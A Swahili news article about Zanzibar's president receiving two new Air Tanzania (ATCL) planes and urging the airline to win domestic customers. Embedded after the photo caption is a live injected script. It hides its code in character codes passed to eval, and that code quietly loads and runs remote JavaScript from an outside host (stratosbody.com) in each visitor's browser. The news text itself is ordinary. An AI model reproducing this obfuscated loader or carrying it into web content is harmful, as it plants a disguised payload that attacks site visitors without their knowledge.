Recent Comments

Rais Mwinyi aitaka ATCL kubuni mbinu kuvuna soko la Tanzania

By Juma Issihaka Oct 8, 2021
<p>Rais wa Zanzibar na Mwenyekiti wa Baraza la Mapinduzi, Dk. Hussein Ali Mwinyi</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

RAIS wa Zanzibar na Mwenyekiti wa Baraza la Mapinduzi, Dk. Hussein Ali Mwinyi jana, amepokea ndege mbili za Shirika la Ndege Tanzania (ATCL), huku akilitaka kubuni mbinu za kuvutia soko la wateja wa ndani.

Amesema idadi ya Watanzania inakadiriwa kufikiwa milioni 60 kwa sasa huku shughuli za uchumi zinapanuka na Miji inakua, lakini bado ni idadi ndogo ya wananchi wanaotumia usafiri wa anga, hivyo ni kazi ya ATCL kuwashajihisha kutumia usafiri huo.

Akizungumza katika hafla ya mapokezi ya ndege hizo, zilizopewa majina ya Tanzanite na Zanzibar, Dk. Mwinyi alisema bado kuna fursa nyingi katika soko la ndani na masoko ya kikanda katika sekta ya usafiri wa anga.

“Nchi yetu ni kubwa inahitaji huduma za haraka na za uhakika za usafiri, bado usafiri wa anga unajulikana kuwa salama kuliko aina nyingine, nafahamu kuwepo kwa changamoto ya gharama lakini kwa kadri tutakavyozitumia ndege hizi bei itashuka,” alisema.

Alisema kutokana na hilo, shirika litapata faida na kuwataka viongozi wajifunze kutoka kwa nchi zilizofanya vizuri katika sekta hiyo.

ATAKA UFANISI WA HUDUMA

Alisema ufanisi wa ndege hizo nchini, unategemea juhudi na ufanisi wa huduma zinazotolewa na taasisi zilizopo katika viwanja vya ndege zikiwemo uhamiaji, afya na kodi.

“Kila moja inaweza kuathiri ufanisi wa nyingine kwa hivyo nahimiza taasisi hizo kufanya kazi kwa ushirikiano na ufanisi unaotakiwa,” alieleza Dk. Mwinyi.

Aliongeza kwa kulikaribisha ATCL Zanzibar katika kuimarisha sekta ya utalii na kusisitiza kwamba, wataendelea kuibua masoko mapya ya utalii katika Mashariki ya kati na mbali.

Alisema juhudi hizo haziendi kwa kasi wanayoitaka kutokana na utegemezi wa kampuni za nje kuleta watalii visiwani humo, hivyo imani yake ni kwamba ndege hizo zitaimarisha sekta ya utalii na biashara kwa kasi.

Aidha, alisema ni furaha kwa wazanzibari kuona tukio la mapokezi ya ndege hizo linafanyika visiwani Zanzibar, zilizowasili awali zilipokelewa katika Uwanja wa Ndege wa Kimataifa wa Julius Nyerere (JNIA).

Alisema hatua hiyo ni muendelezo wa juhudi za viongozi katika kudumisha mawazo na falsafa za waasisi wa mataifa hayo za kuulinda na kuudumisha muungano.

Alifafanua mapokezi ya ndege hizo ni hatua muhimu katika juhudi zinazoendelea kuchukuliwa na serikali ya Jamhuri ya Muungano katika kuliimarisha ATCL lililoanzishwa mwaka 1977.

“Ni jambo la kujivunia kuwa shirika la ndege lililo imara na lenye uwezo mkubwa wa kutoa huduma bora kwa abiria wake.

“Shirika letu hivi sasa linamiliki ndege 11, kati ya hizo kuna Bombadier Q8400, Bombadier CS300 na Boeing 787 Dreamliner, lengo ni kuwezesha ATCL kuwa na ndege 16 ifikapo mwaka 2023, mipango ya kuzipata ndege hizo inaendelea,” alisema.

Aliwahimiza wananchi na wafanyabiashara kuendelea kutumia ndege hizo kwa huduma za usafiri wa abiria na mizigo yao.

Alisisitiza kwamba hayo ni mafanikio makubwa, kwa kuwa sekta ya usafirishaji majini, angani na nchi kavu ni msingi muhimu wa maendeleo ya uchumi wa Tanzania na Dunia.

Alieleza sekta ya usafirishaji ndiyo msingi katika kukuza sekta ya utalii, biashara, viwanda, kilimo na madini na kurahisisha shughuli za watu, huku maendeleo katika usafiri wa anga yana uhusiano mkubwa na ukuaji wa ajira siyo tu katika viwanja vya ndege bali katika sekta nyingine.

Alisema serikali zote mbili kupitia Ilani ya Uchaguzi ya Chama Cha Mapinduzi (CCM) 2025, zimeahidi kuimarisha sekta ya usafiri kwa kujengta miundombinu ya kisasa.

“Ndiyo maana kazi kubwa imefanywa katika pande zote mbili za Jamhuri ya Muungano wa Tanzania katika kuviimarisha viwanja vya ndege, bandari, barabara na reli zetu,” alisema.

Alibainisha mafanikio makubwa yamefanywa katika ujenzi wa viwanja vya ndege mbalimbali bara na visiwani na kwamba Zanzibar inaendelea na mazungumzo na wawekezaji kujenga kiwanja cha ndege cha Pemba ili kukifanya kisiwa hicho kuwa cha uwekezaji.

Alisema ni imani yake ATCL itabuni mikakati imara kuhakikisha malengo ya serikali kuongeza idadi ya ndege kwa ajili ya kukuza uchumi yanafanikiwa.

Aliweka wazi kwamba, ni dhahiri sekta ya usafiri wa anga imeathirika na Ugonjwa wa Virusi vya Corona (Uviko-19), lakini kwa sasa hali ya uchumi wa dunia inaimarika na sekta hiyo inaanza kurejea katika hali yake ya zamani.

Alisema kutokana na hilo, ni jukumu la viongozi wa ATCL, wanazigeuza changamoto kuwa fursa.

“Wana kazi ya kubuni na kutekeleza mipango mbalimbali itakayowezesha kuhimili ushindani mkubwa wa masoko uliopo katika sekta ya usafiri wa anga,” alisema Dk. Mwinyi.

Waziri Mkuu, Kassim Majaliwa, alisema ndege hizo zitaongeza safari za ATCL ndani na nje ya nchi na hivyo kufungua fursa mbalimbali zikiwemo za uchumi na biashara kwa Watanzania.

Aidha, alitoa salamu kutoka kwa Rais Samia Suluhu Hassan na Makamu wa Rais Dk. Philip Mpango kwa wananchi wa Zanzibar.

“Leo hii ni siku ya furaha kwetu Watanzania kwa mapokezi ya ndege mpya mbili zetu, ikiwa zinakamilisha ndege 11 zilizonunuliwa kwa fedha zetu wenyewe, jambo hili ni kubwa sana,” alisema.

Kwa upande wake, Waziri wa Ujenzi na Uchukuzi, Profesa Makame Mbarawa, alisema kuwasili kwa ndege hizo kutaongeza miruko kwa safari za ndani na kikanda.

Alieleza ni imani yake kwamba kuongezeka kwa ndege hizo kutafanya kuwepo kwa safari za Zanzibar kwenda Pemba.

Aliahidi kusimamia shirika hilo, kuhakikisha linakuwa na miundombinu bora na kutoa mchango wa kuimarisha sekta mbalimbali zikiwemo utalii na uchumi.

Rais Dk. Mwinyi akizindua ndege zilizowasili nchini, leo

Akitoa taarifa ya ATCL, Mtendaji Mkuu wa Shirika hilo, Mhandisi Ladislaus Matindi, alisema kwa sasa wanafanya ukarabati wa viwanja vya Iringa na Mtwara na kwamba hivi karibuni wataanza safari katika Mkoa wa Mtwara.

Aliongeza wapo katika hatua za mwisho za kuanza safari za muunganisho kutoka Dodoma kwenda Mwanza na Zanzibar kwenda Pemba.

Kwa mujibu wa Mhandisi Mtindi, tayari shirika hilo limeanzisha vituo nane kwa ajili ya safari za ndege zake nje ya nchi, huku tathmini ikifanyika kuanza safari za Dar es Salaam kwenda Lagos nchini Nigeria.

Alieleza serikali imeendelea kuliwezesha shirika kuwa na uwezo wa kuhudumia ndege zake na sasa inatengeneza zote ikiwemo kubwa katika karakana ya Kilimanjaro.

Alibainisha kwa sasa wanatoa huduma ya maeneo ya kupumzikia wageni na aliomba serikali ya Mapinduzi Zanzibar, kuwapa eneo la kupumzikia wageni katika Uwanja wa Abeid Amani Karume.

Hata hivyo, alisema mifumo mbalimbali imebadilishwa ikiwemo huduma kwa mteja, ukatishaji tiketi na kwa sasa wateja wanakata kupitia tovuti ya ATCL, mawakala nchini na nje ya nchi.

Aliongeza shirika hilo, limethibitishwa na Shirikisho la Uafiri wa Anga Duniani IATA na kutunukiwa cheti ambacho ni muhimu kwa kupata vibali vya biashara nchi nyinine.

Alibainisha kwamba kwa sasa umiliki wa soko umeongezeka kutoka asilimi 2.5 wakati shirika linafufuliwa na kufikia asilimia 73, huku watumishi wakiongezwa kutoka 171 hadi 644.

Alieleza marubani wameongezwa kutoka 11 hadi 100, wahandisi wakiongezwa na kufikia 107 na watumishi wa kada nyingine wakiongezwa kutoka 102 hadi 307.

Kwa mujibu wa Mtendaji Mkuu huyo, shirika hilo limeingiza sh.  bilioni 57.63 kama kodi.

Alisema kabla ya ugonjwa wa Virusi vya Corona (Uviko-19), waliingia mkataba na kampuni ya nchini China kwa ajili ya kusafirisha watalii, pia wameingia mkataba na moja ya Hospitali mjini Mumbai ambayo inatoa unafuu wa matibabu kwa mgonjwa aliyesafiri kwa ATCL.

Hata hivyo, alisema shirika hilo linaendelea kuwakutanisha wafanyabiashara wa Tanzania na maeneo inakofanya safari zake, hivi karibuni ilisafirisha wafanyabiashara kadhaa kutoka nchini kwenda Mumbai.

Alisema kufanya hivyo kunatoa nafasi kwa Tanzania kutangaza bidhaa zake na hivyo kupata masoko ya kimataifa ili ATCL ipate mizigo ya kubeba.

Mkuu wa Mkoa wa Magharibi, Idrissa Kitwana Mustafa, alisema hatua kubwa zaidi inayowapa moyo ni majina ya ndege hizo, ambayo ni Zanzibar na Tanzanite yanaashiria kudumisha muungano.

Alipongeza uongozi wa viongozi wawili hao kwa kipindi chote, kwani wananchi kwakuwa wazanzibari wanaonyesha dhamira kwa vitendo.

Aliongeza katika kipindi kifupi wananchi na viongozi mbalimbali wamekuwa mashuhuda wa mafanikio yaliyopatikana kitaifa na kimataifa.

Alieleza ujio wa ndege hizo utafungua fursa mbalimbali za uchumi wa buluu, kwani zitaleta wageni kutoka nje na hivyo, kuleta ajira kwa watanzania hatimaye kutekeleza ilani ya Chama Cha Mapinduzi (CCM).

Kuwasili kwa ndege hizo kunafanya Shirika la Ndege Tanzania (ATCL), kuwa na jumla ya ndege 11, zilizoahidiwa na serikali huku nyingine tano zilizolipiwa zikitarajiwa kuwasili baadaye.

Ndege hizo ambapo moja imepewa jina la Tanzanite na nyingine ni Zanzibar, zimewasili kutokea nchini Canada na zimeendeshwa na marubani wa Tanzania, Capt. Budodi na Suad.

Hata hivyo, ndege moja aina ya Airbus A220-300 ina uwezo wa kubeba abiria 132, ambapo 12 ni katika daraja la biashara na 120 katika daraja la uchumi.

Pia, ndege hiyo ina uwezo wa kuruka ikiwa na abiria na mizigo kwa saa sita bila kushuka, ikiwa ni sawa na safari ya kutokea Tanzania hadi nchini India bila kweka kituo njiani.

Ndege iliyopewa jina la Zanzibar ilitua katika ardhi ya Tanzania, Uwanja wa Ndege wa Abeid Amani Karume saa 9:24, uwanja ambao una uwezo wa una uwezo wa kubeba ndege 14 kwa pamoja

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.